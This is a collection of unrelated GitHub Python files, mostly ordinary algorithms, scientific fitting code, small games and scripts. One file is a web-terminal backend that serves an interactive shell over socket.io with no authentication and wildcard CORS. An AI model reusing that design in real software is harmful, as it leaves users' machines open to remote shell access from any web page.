+{"seq_id":"24938891747","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nx = np.arange(-3, 1, 0.1)\ny1 = np.exp(4 * x)\ny2 = 2 * np.cos(3 * x)\ny3 = x ** 2 + 4\nplt.plot(x, y1, color=\"red\", linestyle=\":\", label=\"$y=e^{4x}$\")\nplt.plot(x, y2, color=\"blue\", label=\"$y=2\\cos(3x)$\")\nplt.plot(x, y3, color=\"forestgreen\", linestyle=\"--\", label=\"$y=x^2+4$\")\nplt.xticks(np.arange(-3, 2))\nplt.yticks(np.arange(0, 40, 5))\nplt.title(\"Wykres trzech funkcji\")\nplt.grid()\nplt.legend(loc=2)\nplt.savefig(\"zad1.webp\")\nplt.show()\n","repo_name":"pjastr/wd2023_egz_rozw","sub_path":"F11/zad1.py","file_name":"zad1.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"37635874669","text":"import numpy as np\nimport torch\nfrom torch_geometric.utils import degree\nfrom torch_scatter import scatter_sum\n\nfrom data_utils import load_dimacs_cnf, load_dimacs_graph\nfrom const_language import Constraint_Language\n\n\nclass CSP_Data:\n \"\"\" Class to represent a binary CSP instance \"\"\"\n\n def __init__(self, num_vars, const_lang, edges, batch=None, path=None):\n \"\"\"\n :param num_vars: Size of the underlying domain\n :param const_lang: A Constraint_Language object that specifies the language of the instance\n :param edges: A dict of edge tensors. edges[rel] is a torch long tensor of shape 2 x m_{rel} where edges[rel]_i is the i-th edge of relation rel.\n :param batch: optional long tensor that indicates the instance in the batch which each variable belongs to.\n :path path: Optional string that holds the original path of an instance loaded from disc.\n \"\"\"\n self.num_vars = num_vars\n self.const_lang = const_lang\n self.edges = edges\n self.path = path\n\n self.batch = torch.zeros((num_vars,), dtype=torch.int64) if batch is None else batch\n self.batch_size = self.batch.max() + 1\n\n self.device = 'cpu'\n\n # degree and inverse degree needed for mean pooling\n self.var_deg = degree(torch.cat([e.reshape(-1) for e in edges.values()]), dtype=torch.float32, num_nodes=self.num_vars)\n self.var_reg = 1.0 / (self.var_deg + 1.0e-6).view(-1, 1)\n\n def to(self, device):\n # move data to given device\n self.device = device\n self.var_deg = self.var_deg.to(device)\n self.var_reg = self.var_reg.to(device)\n self.batch = self.batch.to(device)\n\n self.const_lang.to(device)\n\n for k in self.edges.keys():\n self.edges[k] = self.edges[k].to(device)\n\n @staticmethod\n def collate(data_list):\n # merge instances into one batch\n\n num_vars = sum([d.num_vars for d in data_list])\n const_lang = data_list[0].const_lang\n path = data_list[0].path\n batch = torch.cat([d.batch + i for i, d in enumerate(data_list)])\n\n # combine edges and shift variables to batch offset\n var_offset = 0\n edges = {rel: [] for rel in const_lang.relations.keys()}\n for data in data_list:\n for rel, edge_idx in data.edges.items():\n edges[rel].append(edge_idx + var_offset)\n var_offset += data.num_vars\n\n edges = {rel: torch.cat(edge_idx, dim=1) for rel, edge_idx in edges.items() if len(edge_idx) > 0}\n\n # create merged instance\n data = CSP_Data(num_vars, const_lang, edges, batch, path)\n return data\n\n def hard_assign(self, soft_assignment):\n # assign value with larges prob to each variable\n return torch.argmax(soft_assignment, dim=-1)\n\n def constraint_sat_prob(self, soft_assignment):\n \"\"\"\n :param soft_assignment: a soft variable assignment\n :return sat_prob: dictionary where sat_prob[rel] is a torch float tensor such that sat_prob[rel]_{i,t}. 
is the prob of edge i being satisfied in time step t.\n \"\"\"\n\n soft_assignment = soft_assignment.view(self.num_vars, -1, self.const_lang.domain_size)\n sat_prob = {}\n for rel, edge_idx in self.edges.items():\n # characteristic matrix\n R = self.const_lang.char_matrices[rel]\n\n # get soft assignments at each edge\n p1 = soft_assignment[edge_idx[0]]\n p2 = soft_assignment[edge_idx[1]]\n\n # compute probability\n sat_prob[rel] = (torch.matmul(p1, R) * p2).sum(dim=2)\n\n return sat_prob\n\n def count_unsat(self, soft_assignment):\n \"\"\"\n :param soft_assignment: a soft variable assignment\n :return num_unsat: tensor such that num_unsat_{i,t} is the number of unsatisfied constraints on instance i in time step t.\n \"\"\"\n hard_assignment = self.hard_assign(soft_assignment)\n num_unsat = torch.zeros((self.batch_size, hard_assignment.shape[1]), dtype=torch.int64, device=self.device)\n for rel, edge_idx in self.edges.items():\n R = self.const_lang.char_matrices[rel]\n v1 = hard_assignment[edge_idx[0]]\n v2 = hard_assignment[edge_idx[1]]\n edge_unsat = (1.0 - R[v1, v2]).long()\n num_unsat += scatter_sum(edge_unsat, self.batch[edge_idx[0]], dim=0)\n return num_unsat\n\n @staticmethod\n def load_2cnf(path):\n # load 2sat formula from disc\n\n const_lang = Constraint_Language.get_2sat_language()\n cnf = load_dimacs_cnf(path)\n cnf = [np.int64(c) for c in cnf]\n num_var = np.max([np.abs(c).max() for c in cnf])\n\n def clause_type(clause):\n # returns the relation type for a given clause\n if clause[0] * clause[1] < 0:\n return 'IMPL'\n elif clause[0] > 0:\n return 'OR'\n else:\n return 'NAND'\n\n # fill unit clauses\n cnf = [[c[0], c[0]] if len(c) == 1 else c for c in cnf]\n\n # normalize implication clauses\n cnf = [[c[1], c[0]] if clause_type(c) == 'IMPL' and c[0] > 0 else c if len(c) == 1 else c for c in cnf]\n\n edges = {rel: [] for rel in {'OR', 'IMPL', 'NAND'}}\n for i, c in enumerate(cnf):\n u = abs(c[0]) - 1\n v = abs(c[1]) - 1\n rel = clause_type(c)\n edges[rel].append([u, v])\n\n edges = {rel: torch.tensor(e).transpose(0, 1) for rel, e in edges.items() if len(e) > 0}\n data = CSP_Data(num_vars=num_var, const_lang=const_lang, edges=edges, path=path)\n return data\n\n @staticmethod\n def load_graph_maxcol(path, num_colors):\n # load graph from disc and create coloring instance\n\n nx_graph = load_dimacs_graph(path)\n const_lang = Constraint_Language.get_coloring_language(num_colors)\n\n num_vert = nx_graph.order()\n idx_map = {v: i for i, v in enumerate(nx_graph.nodes())}\n\n edge_idx = torch.tensor([[idx_map[u], idx_map[v]] for u, v in nx_graph.edges()])\n edge_idx = edge_idx.transpose(0, 1)\n edges = {'NEQ': edge_idx}\n\n data = CSP_Data(num_vars=num_vert, const_lang=const_lang, edges=edges, path=path)\n return data\n\n @staticmethod\n def load_graph_maxcut(path):\n # load graph from disc and create weighted maxcut instance\n nx_graph = load_dimacs_graph(path)\n const_lang = Constraint_Language.get_maxcut_language()\n\n num_vert = nx_graph.order()\n idx_map = {v: i for i, v in enumerate(nx_graph.nodes())}\n\n edges = {'EQ': [], 'NEQ': []}\n for u, v, w in nx_graph.edges(data='weight'):\n rel = 'NEQ' if w > 0 else 'EQ'\n edges[rel].append([idx_map[u], idx_map[v]])\n\n edges = {rel: torch.tensor(e).transpose(0, 1) for rel, e in edges.items() if len(e) > 0}\n\n data = CSP_Data(num_vars=num_vert, const_lang=const_lang, edges=edges, path=path)\n return 
data\n","repo_name":"toenshoff/RUNCSP-PyTorch","sub_path":"csp_data.py","file_name":"csp_data.py","file_ext":"py","file_size_in_byte":7012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"35355472897","text":"import functools\nimport logging\n\nimport gvar as gv\nimport lsqfit as lsq\nimport natpy as nat\nimport numpy as np\n\nfrom utilities import jackknives, structure, particles, configIDs\n\n\nJackknifeEnsemble = jackknives.JackknifeEnsemble\nStructure = structure.Structure\n\n\nlogger = logging.getLogger(__name__)\nlogging.Formatter(fmt=\"%(name)s(%(lineno)d)::%(levelname)-8s: %(message)s\")\n\n\nclass Fit_1d:\n def __init__(\n self,\n fcn: callable,\n nparams: int,\n x: np.ndarray,\n y,\n y_err: np.ndarray = None,\n jackknives: list[JackknifeEnsemble] = None,\n initial_guess: list[float] = None,\n calculate_naive_chi_sq: bool = False,\n fit_jackknives: bool = False,\n ):\n self.fcn = fcn\n self.nparams = nparams\n self.x = x\n if isinstance(y[0], gv.GVar):\n if y_err is not None:\n logging.warning(\n \"y is array of gvar variables so passed y_err will be ignored.\"\n )\n if jackknives is not None and not fit_jackknives:\n logger.warning(\n \"Jackknives were supplied. Passing y as collection of gvar variables with fit_jackknives = False will result in the jackknives being ignored and the existing covariance between the gvars to be used instead.\"\n )\n elif jackknives is not None:\n logger.warning(\n \"Using existing correlation between the y data from gvars. Jackknives will only be used for the fit on a jackknife level.\"\n )\n\n # In case gvar were passed as a list\n self.y = gv.gvar(y)\n\n elif isinstance(y[0], (float, np.floating)):\n if y_err is jackknives is None:\n raise ValueError(\n \"y is array of floats so either y_err or jackknives must be non-None.\"\n )\n if y_err is None:\n logger.info(\n \"Setting uncertainties using covariance matrix from jackknives.\"\n )\n self.covariance_matrix = covariance_matrix(jackknives)\n self.y = gv.gvar(y, self.covariance_matrix)\n elif jackknives is None:\n self.y = gv.gvar(y, y_err)\n else:\n raise ValueError(\"y must be array of gvars or floats.\")\n\n if initial_guess is None:\n logger.info(\"Taking initial guess to be zero for all fit parameters.\")\n self.initial_guess = [0] * self.nparams\n else:\n self.initial_guess = initial_guess\n\n self.calculate_naive_chi_sq = calculate_naive_chi_sq\n if fit_jackknives and jackknives is None:\n raise ValueError(\"Jackknives must not be None to be fit\")\n self.jackknives = jackknives\n self.fit_jackknives = fit_jackknives\n\n def do_fit(self):\n self.average_fit = lsq.nonlinear_fit(\n data=(self.x, self.y), fcn=self.fcn, p0=self.initial_guess\n )\n\n if self.calculate_naive_chi_sq:\n diagonal_covariance_mat = gv.evalcov(self.y) * np.eye(self.y.size)\n self.uncorrelated_y = gv.gvar(gv.mean(self.y), diagonal_covariance_mat)\n self.naive_fit = lsq.nonlinear_fit(\n data=(self.x, self.y), fcn=self.fcn, p0=[gv.mean(self.average_fit.p)]\n )\n\n if self.fit_jackknives:\n self.jackknife_fits = []\n ncon = self.jackknives[0].ncon\n self.jackknife_fits_values = np.zeros(ncon)\n for icon in range(ncon):\n y_data = [\n jackknife_ensemble.jackknives[icon]\n for jackknife_ensemble in self.jackknives\n ]\n y_err = [\n jackknife_ensemble.uncertainties[icon]\n for jackknife_ensemble in self.jackknives\n ]\n \n self.jackknife_fits.append(\n lsq.nonlinear_fit(\n data=(self.x, y_data, y_err),\n fcn=self.fcn,\n p0=gv.mean(self.average_fit.p),\n )\n )\n self.jackknife_fits_values[icon] = self.jackknife_fits[icon].pmean\n self.jackknife_fits_values = JackknifeEnsemble(self.jackknife_fits_values)\n\ndef covariance_matrix(jackknife_ensembles: list[JackknifeEnsemble]) -> np.ndarray:\n 
ensemble_averages = np.asarray(\n [ensemble.ensemble_average for ensemble in jackknife_ensembles]\n )\n product_of_average = ensemble_averages[:, None] * ensemble_averages[:, None].T\n jackknives = np.asarray([ensemble.jackknives for ensemble in jackknife_ensembles])\n ncon = jackknives.shape[1]\n average_of_product = np.matmul(jackknives, jackknives.T) / ncon\n return (ncon - 1) * (average_of_product - product_of_average)\n\n\nclass PolarisabilityFit(Fit_1d):\n def __init__(\n self,\n particle: str,\n structure: Structure,\n ensemble: configIDs.PACSEnsemble,\n mass: gv.GVar,\n energy_shift: np.ndarray,\n mass_jackknives: JackknifeEnsemble = None,\n energy_shift_jackknives: list[JackknifeEnsemble] = None,\n initial_guess: float = 0,\n calculate_naive_chi_sq: bool = True,\n fit_jackknives: bool = False,\n ):\n self.particle = particle\n self.structure = structure\n self.ensemble = ensemble\n self.mass = mass\n self.energy_shift = energy_shift\n self.num_kd = energy_shift.size\n\n x = np.arange(1, self.num_kd + 1)\n\n self.landau_term = self.calculate_landau(\n mass, particle, structure, spacing=ensemble.a\n )\n y = energy_shift - self.landau_term * x\n \n if fit_jackknives and None not in (mass_jackknives, energy_shift_jackknives):\n self.mass_jackknives = mass_jackknives\n self.energy_shift_jackknives = energy_shift_jackknives\n self.landau_jackknives = self.calculate_landau(\n self.mass_jackknives.jackknives, particle, structure, spacing=ensemble.a\n )\n jackknives = [JackknifeEnsemble(self.energy_shift_jackknives[i].jackknives - self.landau_jackknives * x[i]) for i in range(self.num_kd)]\n \n else:\n jackknives = None\n\n super().__init__(\n fcn=self._quadfit,\n nparams=1,\n x=x,\n y=y,\n jackknives=jackknives,\n initial_guess=[initial_guess],\n calculate_naive_chi_sq=calculate_naive_chi_sq,\n fit_jackknives=fit_jackknives,\n )\n\n @staticmethod\n def convert_fit(fit_value: gv.GVar | np.ndarray, spacing: float, Nx = 32, Ny = 32):\n HBARC = 0.1973269718 # GeV fm\n q_d = -1/3\n return (\n -2\n * fit_value\n * nat.constants.alpha.value\n * (-1 / 3) ** 2\n * (spacing**4 * (Nx * Ny / 2 / np.pi) ** 2 / HBARC)\n )\n\n @staticmethod\n def _quadfit(x, a0):\n return x**2 * a0\n\n @staticmethod\n def calculate_landau(\n mass: float | np.ndarray, particle: str, structure: Structure, spacing: float\n ) -> float | np.ndarray:\n \n particle_charge = particles.get_particle_charge(particle, structure)\n q_d = -1 / 3\n Nx = Ny = 32\n HBARC = 0.1973269718 # GeV fm\n landau = (\n abs(particle_charge / (q_d))\n * np.pi\n / Nx\n / Ny\n * (HBARC / spacing) ** 2\n / mass\n )\n return landau\n\n\nif __name__ == \"__main__\":\n shift = np.asarray([0.0259, 0.0443])\n shift_err = np.asarray([0.0033, 0.0056])\n shift_gv = gv.gvar(shift, shift_err)\n mass = gv.gvar(1.053819, 0.011708)\n fit = PolarisabilityFit(\n \"proton_1\",\n Structure(\"uds\"),\n configIDs.PACS_ensembles[13770][\"a\"],\n mass,\n shift_gv,\n )\n fit.do_fit()\n print(fit.average_fit)\n print(fit.convert_fit(fit.average_fit.pmean, fit.ensemble.a))","repo_name":"TommiKabelitz/Physics-utilities","sub_path":"utilities/fitting.py","file_name":"fitting.py","file_ext":"py","file_size_in_byte":8064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"3837372355","text":"from io import open\nfrom setuptools import setup\n\n\nversion = \"0.0.3\"\n\nwith open(\"README.md\", encoding=\"utf-8\") as f:\n long_description = f.read()\n\nsetup(\n name=\"pip_command\",\n version=version,\n\n author=\"pavelgs\",\n author_email=\"p6282813@yandex.ru\",\n\n description=\"lib for fast work with pip commands\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n\n url=\"https://github.com/pavelglazunov/pip-command\",\n\n license=\"Apache License, Version 2.0, see LICENSE file\",\n\n packages=[\"pip_command\"]\n)","repo_name":"pavelglazunov/pip-command","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"31638124278","text":"# a,b = map(int,input().split())\n# a = list(map(int,input().split()))\n# a = [list(map(int,input().split())) for _ in range(n)]\n\n# import sys\n# read = sys.stdin.buffer.read\n# readline = sys.stdin.buffer.readline\n# readlines = sys.stdin.buffer.readlines\n\n# 検討?分 実装分 バグとり分\n\nimport sys\nimport os\nf = open('../../input.txt', 'r')\nsys.stdin = f\n\nimport sys\nread = sys.stdin.buffer.read\nreadline = sys.stdin.buffer.readline\nreadlines = sys.stdin.buffer.readlines\nfrom collections import defaultdict\n\nn,X = map(int,readline().split())\nxyc = list(map(int,read().split()))\n\n\nlinks = [[] for _ in range(n+1)]\nit = iter(xyc)\nfor x,y,c in zip(it,it,it):\n links[x].append((c,y))\n links[y].append((c,x))\n\nnum = [-1] * (n+1)\nnum[1] = 0\nstack = [1]\nwhile(stack):\n i = stack.pop()\n for c,j in links[i]:\n if(num[j] != -1):\n continue\n num[j] = num[i] ^ c\n stack.append(j)\n\nd = defaultdict(int)\nans = 0\nfor i,num_i in enumerate(num[1:],1):\n ans += d[num_i^X]\n d[num_i] += 1\n\nprint(ans)\n","repo_name":"komajun365/competitive_programming","sub_path":"arc/arc045_old/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"71888475689","text":"# leetcode 2389. Longest Subsequence With Limited Sum\n\nclass Solution:\n def answerQueries(self, nums: List[int], queries: List[int]) -> List[int]:\n target = list(accumulate(sorted(nums)))\n answer = list()\n for query in queries :\n answer.append(bisect_right(target,query))\n\n return answer","repo_name":"do0134/solostudy","sub_path":"algorithm/2022/12월/1225/1sol.py","file_name":"1sol.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"33010048449","text":"#!/usr/bin/python3\n\nimport random\n\ng1Count = 0\ng2Count = 0\n\nfor x in range (1,10000000):\n car = random.randint(1, 3)\n guess1 = 1\n if car == 1:\n g1Count += 1\n else:\n g2Count += 1\n\nprint (\"Guess 1 Count: %d\"%g1Count)\nprint (\"Guess 2 Count: %d\"%g2Count)\n","repo_name":"ian-flint/monty","sub_path":"monty.py","file_name":"monty.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"22269615510","text":"class Solution:\n def findPeakElement(self, nums: List[int]) -> int:\n i = 0 # Initialize the left pointer to the start of the array\n j = len(nums) - 1 # Initialize the right pointer to the end of the array\n \n while i < j: # Perform binary search until left and right pointers meet\n mid = int((i + j) / 2) # Calculate the middle index\n \n if nums[mid] < nums[mid + 1]: # If the element at mid is smaller than the next element\n i = mid + 1 # Move the left pointer to mid + 1\n else:\n j = mid # Otherwise, move the right pointer to mid\n \n return i # Return the index i as the peak element index\n","repo_name":"ofmukesh/Learning","sub_path":"LeetCode_Top_150/findPeakElement.py","file_name":"findPeakElement.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"16002402445","text":"from selenium import webdriver\nimport time\n\nbrowser = webdriver.Chrome('/home/disciple/chromedriver')\nbrowser.get('https://web.whatsapp.com/')\n\ntime.sleep(15)\n\nuser_name = 'Whatsapp bot'\n\nuser = browser.find_element_by_xpath('//span[@title=\"{}\"]'.format(user_name))\nuser.click()\n\nmessage_box = browser.find_element_by_xpath('//*[@id=\"main\"]/footer/div[1]/div[2]/div/div[2]')\nmessage_box.send_keys('Hey, I am your whatsapp bot')\n\nmessage_box = browser.find_element_by_xpath('//*[@id=\"main\"]/footer/div[1]/div[3]/button')\nmessage_box.click()\n","repo_name":"Gurupra5ad/whatsapp-automation","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"15120644716","text":"import random\nimport sys\nfrom time import sleep\n\n\nclass Game:\n def __init__(self, lower, upper, number_of_guesses):\n super().__init__()\n self.lower = lower\n self.upper = upper\n self.number_of_guess = number_of_guesses\n self.name = None\n self.guess = None\n self.sleep_time = 2 # Sleeping to add effect.\n self.secret_number = None\n self.correctly_guessed = None\n self.ending_answer = None\n\n def welcome_sequence(self):\n print(\"Hello, what is your name?\")\n self.name = input()\n\n print(f\"Well, {self.name}, I am thinking of a number between {self.lower} and {self.upper}. Can you guess it?\")\n sleep(self.sleep_time)\n print(f\"You have {self.number_of_guess} guesses; use them wisely.\")\n sleep(self.sleep_time)\n\n self.begin_guessing()\n\n def begin_guessing(self):\n self.secret_number = random.randint(self.lower, self.upper)\n self.correctly_guessed = False\n\n print(f\"Alright, {self.name}, start guessing by entering an integer!\")\n for guess_number in range(self.number_of_guess):\n self.grab_guess()\n if self.guess > self.secret_number:\n print(\"That's too high!\")\n elif self.guess < self.secret_number:\n print(\"That's too low!\")\n elif self.guess == self.secret_number:\n print(f\"You correctly guessed the number in {guess_number} amount of tries!\")\n self.correctly_guessed = True\n self.ending()\n self.ending()\n\n def ending(self):\n self.ending_answer = None\n\n if self.correctly_guessed:\n sleep(self.sleep_time)\n print(f\"I'm impressed {self.name}. Guessing the correct number was not an easy task.\")\n else:\n print(f\"Unfortunately you ran out of guesses. The secret number was {self.secret_number}.\")\n\n sleep(self.sleep_time)\n print(f\"What do you say {self.name}, would you like to play again? (y/n):\")\n self.ending_answer = input()\n\n if self.ending_answer == 'y':\n self.begin_guessing()\n else:\n print(\"Thanks for playing!\")\n\n sleep(self.sleep_time)\n sys.exit()\n\n def grab_guess(self):\n try:\n self.guess = int(input())\n except ValueError:\n print(\"That's not an integer, try again...\")\n self.grab_guess()\n\n\nif __name__ == '__main__':\n Game(1, 20, 5).welcome_sequence()\n","repo_name":"SinfulPhantom/Guessing-Game","sub_path":"guessing_game.py","file_name":"guessing_game.py","file_ext":"py","file_size_in_byte":2528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"71732261929","text":"import os, sys\nimport struct\nimport pty, fcntl, termios\nimport time\nimport array\n\nimport subprocess\nimport asyncio\n\nimport json\nimport platform\n\n\ntry:\n import socketio\nexcept ModuleNotFoundError as e:\n print(f\"module not found error: {e}\")\n print(\"trying to install module...\")\n subprocess.run(\"python3 -m pip install python-socketio\", shell=True, check=True)\n import socketio\n\ntry:\n import uvicorn\nexcept ModuleNotFoundError as e:\n print(f\"module not found error: {e}\")\n print(\"trying to install module...\")\n subprocess.run(\"python3 -m pip install uvicorn[standard]\", shell=True, check=True)\n import uvicorn\n\n\nPORT = 0\nSHELL = \"\"\nCHILD = 0\n\nclass TTY:\n pid = None\n fd = None \n\n def __init__(self):\n try:\n pid, fd = pty.fork()\n except OsError as e:\n print(f\"OSError: {e}\")\n\n if pid < 0:\n # error\n print(\"pty fork error!\")\n elif pid == CHILD:\n sys.stdout.flush()\n try:\n os.environ[\"TERM\"] = \"xterm-256color\"\n os.execl(SHELL, SHELL)\n except:\n print(\"execl failed!\")\n\n else:\n self.pid = pid\n self.fd = fd\n\n self.resize(0, 0)\n\n tcattrib = termios.tcgetattr(fd)\n tcattrib[3] = tcattrib[3] & ~(termios.ICANON)\n termios.tcsetattr(fd, termios.TCSAFLUSH, tcattrib)\n\n \n def resize(self, cols, rows):\n fcntl.ioctl(self.fd, termios.TIOCSWINSZ, struct.pack(\"HHHH\", rows, cols, 0, 0))\n\n def write(self, bytes):\n try:\n os.write(self.fd, bytes)\n except OSError as e:\n print(f\"os.write() error: {e}\")\n \n\n def read(self):\n buf = array.array('i', [0])\n query = termios.FIONREAD\n if platform.system() == \"Darwin\":\n query = termios.TIOCOUTQ\n if fcntl.ioctl(self.fd, query, buf, 1) < 0:\n print(\"error with fcntl.ioctl(termios.FIONREAD)\")\n return \"\"\n \n return os.read(self.fd, buf[0])\n \n def tcDrain(self):\n termios.tcdrain(self.fd)\n\n def close(self):\n self.write(b\"\\0\")\n os.close(self.fd)\n\n\ndef readSTDIN():\n buf = array.array('i', [0])\n if fcntl.ioctl(sys.stdin.fileno(), termios.FIONREAD, buf, 1) < 0:\n print(\"error with fcntl.ioctl(termios.FIONREAD)\")\n return \"\"\n \n return os.read(sys.stdin.fileno(), buf[0])\n\nserver = socketio.AsyncServer(async_mode='asgi', cors_allowed_origins=\"*\")\napp = socketio.ASGIApp(server)\n\nconnections = {}\n\nasync def ttyFN():\n while True:\n for sid, tty in connections.items():\n data = tty.read()\n if data:\n await server.emit(\"dat2fe\", data=data, to=sid)\n\n await asyncio.sleep(0.01)\n\n@server.event\nasync def connect(sid, environ, auth):\n print(f\"connection: {sid}\")\n connections[sid] = TTY()\n await server.emit(\"reqResz\", to=sid)\n\n@server.on(\"dat2be\")\nasync def dataToBackend(sid, data):\n connections[sid].write(bytes(data, \"utf-8\"))\n\n@server.on(\"resz\")\nasync def reszCB(sid, data):\n obj = json.loads(data)\n cols = int(obj[\"cols\"])\n rows = int(obj[\"rows\"])\n connections[sid].resize(cols, rows)\n\n@server.event\ndef disconnect(sid):\n print(f\"disconnect: {sid}\")\n connections[sid].close()\n connections.pop(sid)\n\n# load settings\nwith open(\"backend-config.json\") as config_file:\n contents = config_file.read()\n config = json.loads(contents)\n PORT = int(config[\"port\"])\n SHELL = config[\"shell\"]\n\nprint(f\"starting server: PORT={PORT}, SHELL={SHELL}\")\n\nloop = asyncio.new_event_loop()\nconfig = uvicorn.Config(app=app, host=\"127.0.0.1\", port=PORT, loop=loop)\ns = uvicorn.Server(config)\nfut = 
loop.create_task(s.serve())\nloop.create_task(ttyFN())\nloop.run_until_complete(fut)\n\n","repo_name":"theVerySharpFlat/webterm","sub_path":"backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3860,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
+{"seq_id":"641800413","text":"'''\n127. Word Ladder\nhttps://leetcode.com/problems/word-ladder/\n'''\n\n\nfrom collections import defaultdict, deque\n\n\n# BFS\nclass Solution:\n def ladderLength(self, beginWord: str, endWord: str, wordList: List[str]) -> int:\n wordSet = set(wordList)\n queue = deque([(beginWord, 0)])\n seen = set([beginWord])\n maskMap = defaultdict(list)\n \n for word in wordList:\n for i in range(len(word)):\n masked = word[:i] + '*' + word[i+1:]\n maskMap[masked].append(word)\n \n while queue:\n word, steps = queue.popleft()\n if word == endWord:\n return steps + 1\n for i in range(len(beginWord)):\n masked = word[:i] + '*' + word[i+1:]\n for candidate in maskMap[masked]:\n if candidate not in seen:\n seen.add(candidate)\n queue.append((candidate, steps+1))\n return 0\n\n\n# Bidirectional BFS\nclass Solution2:\n def ladderLength(self, beginWord: str, endWord: str, wordList: List[str]) -> int:\n queue_begin = deque([(beginWord)])\n queue_end = deque([(endWord)])\n seen_begin = {beginWord: 1}\n seen_end = {endWord: 1}\n maskMap = defaultdict(list)\n \n if endWord not in wordList:\n return 0\n \n for word in wordList:\n for i in range(len(word)):\n masked = word[:i] + '*' + word[i+1:]\n maskMap[masked].append(word)\n \n def bfs(queue, seen_self, seen_other):\n queue_len = len(queue)\n for _ in range(queue_len):\n word = queue.popleft()\n for i in range(len(word)):\n masked = word[:i] + '*' + word[i+1:]\n for candidate in maskMap[masked]:\n if candidate in seen_other:\n return seen_other[candidate] + seen_self[word]\n if candidate not in seen_self:\n seen_self[candidate] = seen_self[word] + 1\n queue.append((candidate))\n \n while queue_begin and queue_end:\n if len(queue_begin) <= len(queue_end):\n ans = bfs(queue_begin, seen_begin, seen_end)\n else:\n ans = bfs(queue_end, seen_end, seen_begin)\n if ans:\n return ans\n\n return 0\n","repo_name":"supawichable/leetcode","sub_path":"0127_word_ladder.py","file_name":"0127_word_ladder.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"14993265039","text":"\n\nfrom math import *\nfrom numpy import *\nimport numpy\nimport pylab as p\nimport random\nimport itertools as itt\n\ndef L(x, k, X ):\n s=1.0\n for j in range(len(X)):\n if j != k:\n s *= float(x-X[j])/(X[k]-X[j])\n return s\n\n\nq=20\n\n[theta1, theta2] = mgrid[0.0: pi+pi/(q-1): pi/(q-1), 0.0: pi+pi/(q-1): pi/(q-1) ]\nz1 = numpy.vectorize(lambda t1,t2: 0.5*cos(t1))\nz2 = numpy.vectorize(lambda t1,t2: 0.5*cos(t2))\nZ1 = z1(theta1, theta2)\nZ2 = z2(theta1, theta2)\n\ntheta = arange( 0.0, pi+pi/(q-1), pi/(q-1) )\nZ = [ 0.5*cos(t) for t in theta]\n\nf = lambda x,y: cos(x*4.0*pi)*sin(y*4.0*pi)\n\nf_ = numpy.vectorize(f)\nF = f_(Z1,Z2)\n\nL2 = lambda z1,z2,i1,i2: L(z1, i1, Z )*L(z2, i2, Z ) \ng = lambda z1,z2: sum([ L2(z1,z2,i1,i2)*F[i1][i2] for (i1,i2) in itt.product(range(q),range(q)) ])\n\n\nX = [ (random.uniform(-0.5,0.5),random.uniform(-0.5,0.5)) for k in range(100) ]\n\nY1 = [ f(z1,z2) for (z1,z2) in X ]\nY2 = [ g(z1,z2) for (z1,z2) in X ]\n\n\nerr = []\nfor k in range(len(Y1)):\n try:\n err.append( log10(abs(Y1[k] -Y2[k])/abs(Y1[k])+1E-17) )\n except:\n pass\n\nimport pylab as p\np.hist(err, bins=30)\np.show()\n\n\n\n\n\n\n\n","repo_name":"nmaxwell/research","sub_path":"FIO/butterfly/approx/interp2D.py","file_name":"interp2D.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"26097703503","text":"from __future__ import division\n\nfrom typing import Union\nimport numbers\nimport numpy\nfrom numpy import ndarray\nfrom pyproj import Proj\nfrom resippy.image_objects.earth_overhead.earth_overhead_point_calculators.abstract_earth_overhead_point_calc \\\n import AbstractEarthOverheadPointCalc\nfrom scipy.spatial.ckdtree import cKDTree\n\n\nclass IGMPointCalc(AbstractEarthOverheadPointCalc):\n def __init__(self,\n lon_array, # type: ndarray\n lat_array, # type: ndarray\n alt_array, # type: Union[ndarray, float]\n projection, # type: Proj\n ):\n self._lons = lon_array\n self._lats = lat_array\n self._npix_y, self._npix_x = lon_array.shape\n self.set_projection(projection)\n if isinstance(alt_array, numbers.Number):\n self._alts = numpy.zeros_like(lon_array)\n else:\n self._alts = alt_array\n self._bands_coregistered = True\n\n self._lons_1d = None # type: ndarray\n self._lats_1d = None # type: ndarray\n self._kd_tree = None # type: KDTree\n self.set_approximate_lon_lat_center(lon_array[int(self._npix_y/2), int(self._npix_x/2)],\n lat_array[int(self._npix_y/2), int(self._npix_x/2)])\n\n @property\n def lon_image(self):\n return self._lons\n\n @property\n def lat_image(self):\n return self._lats\n\n @property\n def alt_image(self):\n return self._alts\n\n def _pixel_x_y_alt_to_lon_lat_native(self, pixel_xs, pixel_ys, alts=None, band=None):\n return self._lons[pixel_ys, pixel_xs], self._lats[pixel_ys, pixel_xs]\n\n def 